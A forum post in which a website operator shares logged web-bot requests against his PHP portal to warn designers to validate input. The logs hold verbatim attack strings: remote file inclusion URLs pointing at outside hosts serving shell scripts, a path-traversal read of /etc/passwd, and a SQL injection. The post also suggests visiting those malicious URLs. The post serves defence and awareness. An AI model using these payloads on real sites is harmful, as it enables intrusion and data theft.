I thought I'd publish some stats for people with websites about methods used by webbots to attack sites. On the frontpage its a bespoke php portal, which secures every point of input and runs a lot of checks to make sure input is valid.
Anyways if your a webdesigner, here's some examples of basic attacks and why you have to secure any point of input. Validate and abort if the input isn't what's wanted... its the least you can do for your users
Code: |
IP: Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3) Remote Address: 65.83.197.216 Remote Port: 1440 --------- Query String: id=http://amyru.h18.ru/images/cs.txt? X-Forwarded: none Script Name: /modules/news/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com
|
Code: |
IP: Agent: libwww-perl/5.79 Remote Address: 194.126.175.35 Remote Port: 56104 --------- Query String: act=lirenews&id=http://www.freewebs.com/nuklir/alat/f.php?? X-Forwarded: none Script Name: /modules/news/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com |
Code: |
IP: Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Remote Address: 58.71.1.35 Remote Port: 46940 --------- Query String: section=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&id=481 X-Forwarded: none Script Name: /modules/shares/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com |
Code: |
IP: Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Remote Address: 222.197.173.53 Remote Port: 4214 --------- Query String: section=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&id=481 X-Forwarded: none Script Name: /modules/shares/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com
|
Code: |
IP: Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) Remote Address: 86.106.16.178 Remote Port: 1903 --------- Query String: section=../../../../../../../../../../../../../../etc/passwd X-Forwarded: none Script Name: /modules/links/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com
|
Code: |
IP: Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Remote Address: 140.130.156.81 Remote Port: 2262 --------- Query String: section=movies&id=http%3A%2F%2Fwww.intel.com%3F&jYQAAtWq86= X-Forwarded: none Script Name: /modules/shares/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com |
Code: |
IP: Agent: Internet Explorer 6.0 Remote Address: 219.137.204.103 Remote Port: 1156 --------- Query String: section=movies&id=481'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' X-Forwarded: none Script Name: /modules/shares/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com
|
Code: |
IP: Agent: libwww-perl/5.803 Remote Address: 81.171.105.6 Remote Port: 55601 --------- Query String: id=http://edl.yoll.net/cmd.txt? X-Forwarded: none Script Name: /modules/news/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com |
Code: |
IP: Agent: libwww-perl/5.79 Remote Address: 72.32.2.231 Remote Port: 59365 --------- Query String: id=http://www.jonat.com/work/psv? X-Forwarded: none Script Name: /modules/news/index.php Request Method: GET POST Data: HTTP-HOST: www.dead-donkey.com |
Just a short sample of recent attacks, i usuallly email the site admins of attack sites but found an overwhelming ingorance and hostility to the damage their site is doing. If you paste one of the odd urls into your address bar, you'll usually find the method of attack, which is trying to get remote php to execute. Obviously the bots have attacked those sites and uploaded malicious code, so its important that you do everything in your power to protect your site, not only for your site and your users, but also for every other site on the internet
I'll post novel attacks in this thread from time to time.